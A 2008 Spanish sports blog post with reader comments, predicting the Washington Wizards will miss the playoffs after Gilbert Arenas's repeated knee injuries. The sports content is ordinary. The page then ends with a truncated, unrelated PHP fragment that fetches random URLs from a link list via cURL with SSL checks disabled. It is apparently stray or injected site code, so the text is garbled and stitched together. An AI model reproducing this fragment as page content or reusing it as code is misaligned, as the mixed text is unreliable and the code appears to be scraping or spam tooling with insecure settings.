Washington Wizards: Sin Agent Zero, probabilidad 0%

06 de October de 2008 por TheDeerHunter

arenasfloorSe acabó. Todo a una carta a la que muchos habríamos apostado. El flamante nuevo contrato con el que pensaban saltar la banca lo firma la fatalidad: Arenas se rompe de gravedad por tercera vez consecutiva con 111 kilos de dólares involucrados en la broma. Si alguien en Washington sigue viendo la botella medio llena es que contenía whisky del cabezón y se ha bebido la mitad que falta.

Se espera la vuelta del Agente Zero de aquí a dos o tres meses. La cuestión gira ahora en torno a en qué condiciones puede llegar una rodilla tras haber padecido tantas malas pasadas como las que ha sufrido la del bueno de Gilbert. Pocas razones objetivas hay para ser optimistas y lejos quedan las hazañas del jugadorazo que nos deslumbró a todos hace dos temporadas. Ni siquiera sus compañeros se molestan en trasmitir un mínimo de ilusión al respecto.

ajamisonYa se sabe lo que supone perder al jugador franquicia en torno al cual gira todo el proyecto y los Wizards lo saben más que nadie. Cada vez han logrado a duras penas sobreponerse a la pérdida de su líder. Otro año más de “a ver si la salud nos respeta esta temporada” y, como respuesta, otro golpe en toda la boca. ¿Con qué moral afrontan la nueva campaña con lo difícil que en esta ocasión se presenta? Esto no lo levanta ni el célebre blog, la aportación más importante que ha dado la estrella del equipo en los últimos tiempos. Con esto queda todo dicho.

El objetivo mínimo este año habría sido pasar de primera ronda pero ahora mismo pocos en Washington no se darían con un canto en los dientes por llegar a postemporada. Todos los que lo lograron con cierta brillantez antaño continuarán en la brecha aunque el escenario es distinto y los ánimos tampoco serán iguales. Habiendo logrado retener a Jamison, el núcleo duro de gladiadores queda intacto. Con Butler, llevan tiempo formando una de las parejas con más solera del Este. El toque de talento, hasta ahora suficiente, incrustado en el acero de los Brendan Haywood, Deshawn Stevenson, Songaila más Ethan Thomas, del que dicen han logrado recuperar, por si faltara algo de leña por repartir.

caronjerseyVeremos si Antonio Daniels pudiera transmitir viejas sensaciones para hacer olvidar el problema central. Por si las moscas han traído a Juan Dixon y a Dee Brown que no son malas piezas dadas las circunstancias. Tras ellos queda lo que puedan aportar los jóvenes Nick Young, Pecherov, McGee o Blatche de los que no se espera que puedan sacar al equipo ni de ricos ni de pobres.

Con todo esto, poco margen de mejora hay respecto a lo que ya se ha hecho. Otra vez a pelear por si en el fragor de la batalla se les olvida la fatalidad que les rodea y, quién sabe, si suena la flauta y vuelve el Agente Zero con la capacidad de hacerles subir el escalón que les hará falta.

Quinteto inicial: Antonio Daniels, DeShawn Stevenson, Caron Butler, Antawn Jamison y Brendan Haywood
6º Hombre: Andray Blatche (Gilbert Arenas cuando vuelva)

Pronóstico: Fuera de Playoffs

Comenta

8 comentarios a esta entrada

  1. Txusma dice:
    #1

    Pues este año tengo ganas de ver a Nick Young del que dicen es un jugoncete y tb si por fin, Blatche se consolida como sexto, algo que apunta Deer en el Analisis. A mi me da que con la vuelta de Ethan Thomas, el sexto hombre de los Wizards puede ser mas un jugador exterior como Juan Dixon o el mismo Young.
    Por lo demas, con la mejora de los equipos del Este, es obvio q este año puede no ser suficiente con Butler y Jamison para clasificarse para los Playoffs pero yo no los daría como claros eliminados. Si ademas Arenas vuelve en Diciemebre y vuelve bien aun habra tiempo de remontar.

      Citar

  2. telekoman dice:
    #2

    Teniendo en cuenta que posiblemente vuelva en Diciembre o Enero, es un poco aventurado darles por muertos. Lo que sí es cierto es que están un poco gafados. Eso sí, es una serie de lesiones que pueden provocar que sus otros jugadores evolucionen mucho. No les veo ganando el anillo, pero al menos llegando a Playoffs puede que sí.

      Citar

  3. TheDeerHunter dice:
    #3

    En realidad, en condiciones normales el pronóstico para la vuelta es un par de meses… pero en este caso siendo la 3ª lesión grave consecutiva que sufre Arenas las perspectivas no son buenas.
    Lo que ha trascendido desde Washington es que en el entorno del equipo apenas se cuenta con que pueda aportar algo positivo esta temporada y que, de volver, más o menos en los plazos que se indican no se arriesgará con él en absoluto. Todos las declaraciones de técnicos y compañeros en ese sentido han sido muy pesimistas. Este es un detalle muy ilustrativo sobre el asunto.
    De hecho, nadie puede aventurar si se volverá a ver a ser el mismo alguna vez. Ya hemos comprobado en “nuestras propias carnes” (Raul Lopez) los efectos de una sucesión de lesiones de ese estilo.
    En cualquier caso, si los Wizards logran por una de esas clasificarse para playoffs creo que Arenas tendrá muy poco que ver en ello.

    Lo de Blatche como sexto hombre ha sido idea de Magic, Txusma… lo cierto es que yo apenas le he visto jugar alguna vez y no tengo ni idea si puede llegar a jugar tanto o no.

      Citar

  4. MagicJohnson32 dice:
    #4

    Es cierto lo de Blatche, disculpa! A mí me gusta, aunque la cabecita le pierde bastante.

    Veremos… veremos si Arenas vuelve a tiempo, si el equipo vuelve a funcionar tan bién como el año pasado sin él (nada descartable), si Butler y Jamison siguen a nivel All-Star (que no hay por qué pensar lo contrario) y si los jóvenes dan un paso al frente.

    Los veo dentro de Playoffs.

      Citar

  5. Jabho dice:
    #5

    Yo tb les veo equipo de PO con o sin Arenas. Pero sin Arenas son carne de 1ª ronda y con Arenas bien tienen opciones y son un equipo complicado.

    Lo de Arenas, si por lo que sea no vuelve a ser el de antes de las lesiones la cosa es jodida. Wizards se ha encomendado a él como piedra angular a corto y medio plazo….

      Citar

  6. TheDeerHunter dice:
    #6

    ¿no queríais sopa???
    Esta madrugada lesión de Jamison tras únicamente 5 min de juego del primer partido de pretemporada… lesión de rodilla, me temo, de la que no se conoce todavía el alcance.
    Antes que eso, Haywood también lesionado… se dice que de 4 a 6 meses de baja.

    Pintan bastos.

      Citar

  7. MagicJohnson32 dice:
    #7

    Anoche se llevaron un susto con Jamison, que se giró la rodilla de una forma bastante fea. Sólo les falta eso…

      Citar

  8. Txusma dice:
    #8

    Pues la lesión de Haywood abre muchos interrogantes en el quinteto inicial. Hace 2 años, Blatche ya disputaba los minutos que dejaban Jamison y Haywood por lo que podria estar ante su año clave. Incluso Etan Thomas, recuperado para el baloncesto tras sus problemas cardiacos (creo q eran), puede disputar de minutos. Y no olvidemos a Pecherov o McGee (horribles SummerLeagues, las suyas) q como esta el patio tb pueden tener oportunidades.
    En todo caso, esto empieza a pintar muy mal…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>